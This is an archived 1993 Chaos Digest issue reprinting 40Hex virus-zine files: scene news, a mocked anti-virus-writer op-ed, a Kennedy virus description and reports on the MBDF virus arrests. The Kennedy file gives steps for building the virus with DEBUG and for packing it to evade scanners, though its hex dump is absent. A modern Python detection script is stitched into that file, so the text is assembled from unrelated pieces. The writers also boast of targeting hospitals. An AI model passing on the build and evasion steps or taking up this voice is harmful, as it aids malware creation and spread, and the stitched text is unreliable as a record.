Chaos Digest Volume 01 Number 49
Chaos Digest Wednesday 9 June 1993 Volume 1 : Number 49
ISSN 1244-4901
Editor: Jean-Bernard Condat (jbcondat@attmail.com)
Archivist: Yves-Marie Crabbe
Co-Editors: Arnaud Bigare, Stephane Briere
TABLE OF CONTENTS, #1.49 (9 June 1993)
File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
linux-activists-request@niksula.hut.fi
with a mail header or first line containing the following information:
X-Mn-Admin: join CHAOS_DIGEST
The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France. He is a member of the EICAR and EFF (#1299)
groups.
Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893. Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:
* kragar.eff.org [192.88.144.4] in /pub/cud/chaos
* uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
* halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
* ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
* cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
* ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
* nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
* orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Tue May 11 09:24:40 PDT 1993
From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Number 6 Volume 2 Issue 2 #005-008(1) (reprint)
40Hex Number 6 Volume 2 Issue 2 File 005
I'm back, well kind of. Anyways, a lot of people have been
asking, "What's going on with the group?" The question should be, "What's
going on with any group these days?" It seems to me that 1992 was the death
of h/p, or at least the "ice age" of it. Everybody was either getting busted
or quitting the scene. Oh well, what can I say about it. Our group has been
having bad luck too. Five (now six) busted as well as other assorted bad
things happening to members.
Anyways, what's going on with us, huh? Well the reason you
haven't heard much from us is because we haven't been releasing our new stuff
to BBS systems (BBS system sounds as redundant as PIN number, I know) because
we have a strong feeling that members of such groups as the CVIA are logging
on to h/p boards in the hope of snatching the latest viruses. Well not much
you can do about it if you run a BBS, unless you personally know everyone
who calls your board. But come to think of it - what good does it prove to
release your newest creation to the general public (of the h/p crowd) via BBS
system? Isn't that the same principle as the warez puppy scene? I guess you
all can do whatever turns you on but we kind of decided that it would be in
our best interests to release our stuff to BBS's only after they have been
detected by the popular scanners or until they are kind of old. Not to fear,
40-HEX and "Dark Angel Phunky Writing Guide" will still be on boards at the
same rate as always.
As for all of you people bitching that we no longer have sites
and that we are dead, well you're dead - wrong. The current sites are as
follows (in no specific order) - Digital Warfare (yes it's back, at a new
number however), Time Lords BBS (The U.S.S.R System), The Phunline (yes it's
back), and the newest addition - Crow Technology. And as for us being dead
yeah right.
** Note from DecimatoR:
The U.S.S.R System recently went down, due to Time Lord getting into a little
hot water. It WILL return however... we're just not sure when. **
** Note from GHeap:
I am coming back, gimme mo' time!
So now with that out of the way, on to the other news. Hmmm...
Michelangelo caused quite a scare there for a while. It was pretty cool
to see John, Patti, and the rest of the crew on T.V... John Dvorak has a new
half hour computer talk show on syndicated radio. I'm sure he wouldn't mind
if we got on the show some time soon. Check your local radio guide for your
local station and time... I am offering a standing bounty of $1,500 for the
person willing to fly to Ohio and kick Crow Meister's ass for good. A minor
would be preferred, being that he is under 18 and if I smashed him I could
get sued or something. Just kidding, Crow Meister is cool with me,
hihihihi... A new federal law is being considered which if passed will outlaw
the authorship of computer viruses totally, research or not. Read more about
that later in this issue... Hey, I might have a BBS up soon! I have been
saying that for the past 2 years haven't I? Well that's the news as I see
it, it's nice to be writing for this rag again.
Check ya in 25 to life....
Hellraiser P/S
1992
This article was typed by Time Lord for HR cuz he is WAY too lazy to send me
a disk in place of a fuckin print out...
+++++
40Hex Number 6 Volume 2 Issue 2 File 006
Well, this little news "tid-bit" came from Attitude Adjuster, one of the
few non-PHALCON/SKISM contributors (ok, the ONLY non P/S member), Thanks a
lot dude, keep the submissions coming. The article itself is quite sad,
and makes me question the intelligence of our opposition.
-)GHeap&Demo
Thanx to CZ for THE line.
---------------------------------------------------------------------------
- We need Computer Virus Snitches -
Written By Mike Royko, Tribune Media Services.
Retyped by The Attitude Adjuster
===========================================================================
Millions of computer users are wondering how to protect themselves
against the wave of viruses that are threatening their machines. I have a
suggestion.[So do I, avoid Bnu 1.90Beta]
First, they should remember that these viruses don't spring from
nature. They are little computer programs that are created and sent on
their way by people that are brainy, malicious and arrogant.[I am not
brainy]
So, the question is, how do you find the creators of computer
virus programs?
Because they are arrogant, it's likely that they want someone to
know what a clever thing they have done. They won't hold a press conference
[Actually, we do hold press conferences. See MichaelAlexander@Computerworld]
but chances are they will brag to a trusted friend or acquaintance or
fellow hacker.
It is sad, but the world is full of snitches.[Get a thesaurus] Look
at John Gotti, the nation's biggest Mafia boss. There was a time when it
was unthinkable for even the lowest-level Mafia soldier to blab. But now
Gotti has to sit in court while his former right-hand man tells about how
they got people whacked. [We whack people too]
So if Mafia figures can be persuaded to tattle[Na-na-na-na-na], is
there any reason to believe that nerds have a greater sense of honor and
loyalty? [Yes, we also have brains]
Of course[.] not, but how do you get them to do it?
Money. [Now yer talking... my mom is really the Dark Avenger, I want
my money now.]
These companies [what companies, I only hit hospitals] could use
petty cash to place ads in the computer magazines and on the electronic
bulletin boards. [Ok, call my BBS and post this tidbit. 40Hex now has ad
space available]
The ads would say something like: "A $50,000 reward for any
information leading to the arrest and conviction of virus authors."
[How can you convict a virus author. It isn't illegal. Go play Tank Wars.]
The next question would be what to do with the virus makers once
they have been caught. And that's the key to putting an end to the
problem: something that could be posted on those electronic bulletin
boards that might cause an aspiring virus-maker to go take a brisk walk
instead.
A judge would sit and listen to an attorney who would say
something like this:
"Your honor, what we have here is an otherwise fine young man
from a good family. His father is a brilliant scholar, and the son will
someday be the same."[I am going to be a certified scholar when I grow up.]
"What he did was no more than an intellectual prank, a cerebral
challenge of sorts. Like the man who climbed Mount Everest because it was
there, he created the virus and sent it forth because it was there."
Then, we can hope, the judge might say something like this:
"Yes, I am impressed by the defendant's brain power. And I
expected you to ask me to give him a slap on the wrist."
"However, he is not a child. He is an adult. And I would think
that so brilliant a grown man would know better than to amuse himself
by screwing with the lives of strangers." [I haven't screwed one stranger]
"It's as if he hid inside the businesses and institutions until
they were closed and everyone had gone home. Then he came out and went
through every filing cabinet and drawer and shredded or burned every bit
of useful information he could find."[Cool! Lets try it.]
"Now, counselor, what would you and your law partners say if some
street mope [See Thesaurus] did that to your firm - crept in and destroyed
every document in your offices? Including the names of clients that owe you
money. Hah, you would be in here asking me to hang him from a tree."[I love
hanging from trees]
"So don't give me that smart kid from a good family routine.
[I ain't smart, and family ain't good] He is a self-centered, insensitive,
uncaring, arrogant goofball [And damn proud]. He didn't give a second
thought to the chaos or heartbreak he would cause an adoption agency, a
hardworking businessman or a medical clinic." [Yes I did. I aim for them.]
"Therefore, I sentence him to the maximum sentence the law allows
in the local jailhouse [0, NUL, ZIP-o, /dev/null, etc..], which is a really
terrible place, filled with all sorts of crude, insensitive hulks."
[Jay-walkers]
"Bailiff, please get the defendant up off the floor and administer
some smelling salts."[More like, why is the defendant laughing?]
"And change his trousers, quickly."[Fuck you]
[]comments added by Demogorgon and GHeap
===========================================================================
I hope you enjoyed that one as much as I did! Okay, I
see some really neat things with this man's article. First off,
I'm sure he's an adept programmer... that is, he can probably
figure out how to get his VCR to tape something while he is
off writing his brilliant articles. I enjoy his narrow-minded
definition of virii (that was mentioned in 40Hex 5), of course,
all virii are those evil overwriting, trigger date, resident,
boot track infecting swine (yeah, he probably learned what a
virus was from watching ABC News covering the Michelangelo
crisis!)
I also enjoy his opinion that all virus authors are
nerds. First off, what the hell is a nerd? I mean, I have
written a virus before (not saying it was any good), but, I
don't feel like a nerd! In fact, I feel quite superior to
most of the idiots like this guy. And, I like his great
statement about my loyalty. Yes, I'm gonna narc on [PHALCON/
[Forget this again, and die]]SKISM for $50,000!!! Yeah, right.
There are a lot of narcs on this not-so good earth, so choose
your friends wisely.
I'm quite sure that ads on BBS's (electronic bulletin
boards! No... cork ones!) would just sufficiently pump up user
discussion of virii. I'm not scared of fed intervention, and
I doubt any authors I know are either.
This was touched on in 40Hex 5, virus authors are not
responsible for the spread of their virii unless they are
actively spreading them! I mean, it's not my fault that K-Rad
Man sent my Hard Drive Blender (slices, dices, minces sectors)
to 1000 Bible boards in Utah. Apparently it hasn't dawned on
this guy that most virii are not written to be destructive.
Actually, that's a lie. There are a lot of virii out there that
are destructive, but that is changing. People like the
PHALCON/SKISM crew realize that not everything must be
destructive, opening the doors to much larger virus projects
(ie Bobisms)
One more thing... QUIT EQUATING THE WORD 'hacker' TO
EVERY DAMN TYPE OF ELECTRONIC 'crime!!!'
I'm gonna get this dude's phone #, I say we call him
sometime...
-The Attitude Adjuster-
+++++
40Hex Number 6 Volume 2 Issue 2 File 007
Let's see what good ole' Patty has to say about this:
Virus Name: Kennedy
Aliases: Dead Kennedy, 333, Kennedy-333
Scan ID: [Kennedy]
V Status: Endangered
Discovered: April, 1990
Symptoms: .COM growth; message on trigger dates (see text);
crosslinking of files; lost clusters; FAT corruption
Origin: Denmark
Eff Length: 333 Bytes
Type Code: PNCKF - Parasitic Non-Resident .COM Infector
Detection Method: ViruScan, Pro-Scan, VirexPC, F-Prot, VirHunt 2.0+,
NAV, IBM Scan 2.00+, AVTK 4.32+, VIRx 1.6+, CPAV 1.0+,
Novi 1.0.1+, Sweep 2.3.1+, UTScan
Removal Instructions: F-Prot, VirHunt 2.0+, or delete infected files
General Comments:
The Kennedy virus was isolated in April 1990. It is a generic
infector of .COM files, including COMMAND.COM.
This virus has three activation dates: June 6 (assassination of
Robert Kennedy 1968), November 18 (death of Joseph Kennedy 1969),
and November 22 (assassination of John F. Kennedy 1963) of any year.
On activation, the virus will display the following
message:
"Kennedy is dead - long live 'The Dead Kennedys'"
The following text strings can be found in the viral code:
"\command.com"
"The Dead Kennedys"
Systems infected with the Kennedy virus will experience
cross-linking of files, lost clusters, and file allocation table
errors (including messages that the file allocation table is bad).
--------------------------------Cut Here------------------------------------
---------------------------------Cut Here-----------------------------------
Ok there it is. Not the most impressive virus around and its caught by just
about every scan on the market, but take PKLite to it and then remove the
PKLite header (Use NOLITE in this issue) and no one will be able to find it.
Anyway it gets the job done.
To make the above hex into a working file, first cut on the dotted lines.
Name the resulting file KENNEDY.TXT.
Then: DEBUG < KENNEDY.TXT and you'll have a working virus.
-Instigator
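A defender-side check built from the indicators in the description above, as an added example that is not part of the original article or of any scanner it names: it flags .COM files that contain both listed text strings and, independently of those strings being visible, files whose size or hash has changed against a known-good baseline (growth of exactly 333 bytes is reported separately). The function names, the reason labels and the inert sample files are assumptions constructed for illustration.

```python
import hashlib
import tempfile
from datetime import date
from pathlib import Path

# Indicators copied from the virus description above.
STRINGS = (b"\\command.com", b"The Dead Kennedys")
GROWTH = 333                                   # "Eff Length: 333 Bytes"
TRIGGER_DATES = {(6, 6), (11, 18), (11, 22)}   # (month, day), any year


def is_trigger_date(day):
    """True on the three activation dates listed in the description."""
    return (day.month, day.day) in TRIGGER_DATES


def com_files(root):
    """Yield (relative name, contents) for every .COM file under root."""
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() == ".com":
            yield path.relative_to(root).as_posix(), path.read_bytes()


def snapshot(root):
    """Known-good baseline: size and SHA-256 of every .COM file under root."""
    return {name: (len(data), hashlib.sha256(data).hexdigest())
            for name, data in com_files(root)}


def scan(root, baseline):
    """Return {file: [reasons]} for .COM files that match an indicator."""
    findings = {}
    for name, data in com_files(root):
        reasons = []
        # DOS file names are case-insensitive, so compare lowercased bytes.
        lowered = data.lower()
        if all(s.lower() in lowered for s in STRINGS):
            reasons.append("strings")
        if name not in baseline:
            reasons.append("new-file")
        else:
            old_size, old_hash = baseline[name]
            if hashlib.sha256(data).hexdigest() != old_hash:
                grew = len(data) - old_size
                reasons.append("growth-333" if grew == GROWTH else "modified")
        if reasons:
            findings[name] = reasons
    return findings


def demo():
    """Run the scan over constructed, inert sample files (no virus code)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        stub = b"\x90" * 64 + b"\xc3"          # constructed filler bytes
        for name in ("CLEAN.COM", "GROWN.COM", "EDITED.COM"):
            (root / name).write_bytes(stub)
        baseline = snapshot(root)              # taken while files are clean
        (root / "GROWN.COM").write_bytes(stub + b"\x00" * GROWTH)
        (root / "EDITED.COM").write_bytes(stub + b"\x00" * 10)
        (root / "TEXT.COM").write_bytes(
            stub + b"\\COMMAND.COM\x00The Dead Kennedys")
        return scan(root, baseline)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, reasons)
    print("trigger date today:", is_trigger_date(date.today()))
```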
+++++
40Hex Number 6 Volume 2 Issue 2 File 008
Take a look at this. I picked it up on fidonet, originally from Virus-L
digest. All the stuff in *< >*'s are my comments.
- Demogorgon
------------------------------
VIRUS-L Digest Wednesday, 26 Feb 1992 Volume 5 : Issue 44
------------------------------
Date: Tue, 25 Feb 92 10:10:14 -0500
From: mha@baka.ithaca.ny.us (Mark Anbinder)
Subject: MBDF Suspects Arrested (Mac)
The Cornell Daily Sun reported in this morning's issue that two
Cornell University sophomores, David Blumenthal and Mark Pilgrim, were
arrested Monday evening and arraigned in Ithaca City Court on one
count each of second degree computer tampering, in connection with the
release of the MBDF virus that infected Macs worldwide over the last
several days. The two are being held in Tompkins County Jail.
*< huh? How does one get arrested for spreading a virus, you ask? read on >*
Further charges are pending.
---
** many lines of mail routing crap have been deleted **
Date: Tue, 25 Feb 1992 11:47:32 PST
From: lipa@camis.stanford.edu (Bill Lipa)
Subject: Alleged MBDF virus-creators arrested at Cornell
"Computer Virus Traced to Cornell Students"
by Jeff Carmona
[The Cornell Daily Sun, 25 February 1992]
Two Cornell students were arrested yesterday for allegedly creating and
launching *< launching ? Bon voyage, we launched you !>* a computer virus
that crippled computers around the world, according to M. Stuart Lynn, the
University's vice president for information technologies.
David Blumenthal '94 and Mark Pilgrim '94 were arrested by Department of
Public Safety officers and arraigned in Ithaca City Court on one count of
second-degree computer tampering, a misdemeanor, *< cool, its only a
misdemeanor, how bad could it be ? >* Lynn said.
Both students were remanded to the Tompkins County Jail and remained in
custody early this morning. They are being held on $2,000 cash or $10,000
bail bond, officials said.
Cornell received national attention in Nov. 1988 when Robert T. Morris
Jr., a former graduate student, was accused of unleashing a computer virus
into thousands of government and university computers.
Morris, convicted under the 1986 Computer Fraud and Abuse Act, was fined
$10,000, given a three-year probation and ordered to do 400 hours of
community service by a federal judge in Syracuse, according to Linda Grace-
Kobas, *< Whats a Koba?? >* director of the Cornell News Service.
Lynn would not compare the severity of the current case with Morris',
saying that "each case is different."
Lynn said the virus, called "MBDFA" was put into three Macintosh games --
Obnoxious Tetris, Tetriscycle and Ten Tile Puzzle.
On Feb. 14, the games were launched from Cornell to a public archive at
Stanford University in Palo Alto, Calif, Lynn said.
*< I guess these guys actually put it up on the archive under their own >*
*< accounts! Don't they know they can trace that stuff? duhhh... >*
From there, the virus spread to computers in Osaka, Japan and elsewhere
around the world *< the archive was a dumb idea if thats how they got caught,
but it spread like hell >* when users connected to computer networks via
modems, he added. It is not known how many computers the virus has affected
worldwide, he explained.
When computer users downloaded the infected games, the virus caused "a
modification of system software," *< oooh...lets not get too technical >* Lynn
said. "This resulted in unusual behavior and system crashes," he added.
Lynn said he was not aware of anyone at Cornell who reported finding the
virus on their computers.
The virus was traced to Cornell last Friday, authorities were quickly
notified and an investigation began, Lynn said.
"We absolutely deplore this kind of behavior," Lynn said. "We will pursue
this matter to the fullest."
Armed with search warrants, Public Safety investigators removed more than
a dozen crates full of evidence from the students' residences in Baker and
Founders halls on West Campus. *< sounds like a typical, over-kill bust to
me. If you don't know what it is, take it. >*
Public Safety officials refused to disclose the contents of the crates or
issue any comment about the incident when contacted repeatedly by phone last
night. *< thats because they don't know what the fuck the stuff is >*
"We believe this was dealt with very quickly and professionally," Lynn
said.
The suspects are scheduled to appear in Ithaca City Court at 1 p.m. today
and additional charges are pending, according to Grace-Kobas.
Because spreading a computer virus violates federal laws, "conceivably,
the FBI could be involved," she added. Officials with the FBI could not be
reached to confirm or deny this.
Blumenthal and Pilgrim, both 19-year-olds, were current student employees
at Cornell Information Technologies (CIT), Lynn said. He would not say
whether the students launched the virus from their residence hall rooms or
from a CIT office.
Henrik N. Dullea '61, vice president for University relations, said he
thinks "the act will immediately be associated with the University," not
only with the individual students charged.
Because a major virus originated from a Cornell student in the past, this
latest incident may again "bring a negative reaction to the entire
institution," Dullea said. *< "blah, blah, blah" >*
"These are very selfish acts," Lynn said, referring to the intentional
distribution of computer viruses, because innocent people are harmed.
Lynn said he was unaware of the students' motive for initiating the virus.
Lynn said CIT put out a notice yesterday to inform computer users about the
"very virulent" virus. A virus-protection program, such as the new version of
Disinfectant, can usually cure computers, but it may be necessary to "rebuild
the hard drive" *< egad! Not the dreaded "virus-that-makes-you-rebuild-your-
hard-drive" !>* in some cases, he added.
A former roommate of Blumenthal said he was not surprised by news of the
arrest. Computers were "more than a hobby" for Blumenthal, said Glen Fuller
'95, his roommate from last semester. "He was in front of the computer all
day," Fuller said.
Blumenthal, who had a modem, would "play around with viruses because they
were a challenge to him," Fuller said. He said that, to his knowledge,
Blumenthal had never released a virus before.
-->-<------ Cut Here --------------------------
------------------------------
VIRUS-L Digest Friday, 28 Feb 1992 Volume 5 : Issue 46
------------------------------
Date: Wed, 26 Feb 92 11:08:45 -0800
From: karyn@cheetah.llnl.gov (Karyn Pichnarczyk)
Subject: CIAC Bulletin C-17: MBDF A on Macintosh (Mac)
NO RESTRICTIONS
_____________________________________________________
The Computer Incident Advisory Capability
___ __ __ _ ___
/ | / \ /
\___ __|__ /___\ \___
_____________________________________________________
INFORMATION BULLETIN
New Virus on Macintosh Computers: MBDF A
February 25, 1992, 1130 PST Number C-17
________________________________________________________________________
NAME: MBDF A virus
PLATFORM: Macintosh computers-except MacPlus and SE (see below)
DAMAGE: May cause program crashes
SYMPTOMS: Claris applications indicate they have been altered; some
shareware may not work, unexplained system crashes
DETECTION &
ERADICATION: Disinfectant 2.6, Gatekeeper 1.2.4, Virex 3.6,
VirusDetective 5.0.2, Rival 1.1.10, SAM 3.0
________________________________________________________________________
Critical Facts about MBDF A
A new Macintosh virus, MBDF A, (named for the resource it exploits)
has been discovered. This virus does not appear to maliciously cause
damage, but simply copies itself from one application to another.
MBDF A was discovered at two archive sites in newly posted game
applications, and has a high potential to be very widespread.
Infection Mechanism
This virus is an "implied loader" virus, and it works in a similar
manner to other implied loader viruses such as CDEF and MDEF. Once
the virus is active, clean application programs will become infected
as soon as they are executed. MBDF A infects only applications, and
does not affect data files. This virus replicates under both System 6
and System 7. While MBDF A may be present on ALL types of Macintosh
systems, it will not spread if the infected system is a MacPlus or a
Mac SE (although it does spread on an SE/30).
Potential Damage
The MBDF A virus has no malicious damaging characteristics, however,
it may cause programs to inexplicably crash when an item is selected
from the menu bar. Some programs, such as the shareware
"BeHierarchic" program, have been reported to not operate correctly
when infected. Applications written with self-checking code, such as
those written by the Claris corporation, will inform the user that
they have been altered.
When MBDF A infects the system file, it must re-write the entire
system file back to disk; this process may take two or three minutes.
If the user assumes the system has hung, and reboots the Macintosh
while this is occurring, the entire system file will be corrupted and
an entire reload of system software must then be performed.
This virus can be safely eradicated from most infected programs,
although CIAC recommends that you restore all infected files from an
uninfected backup.
------------------------------
End of Chaos Digest #1.49
************************************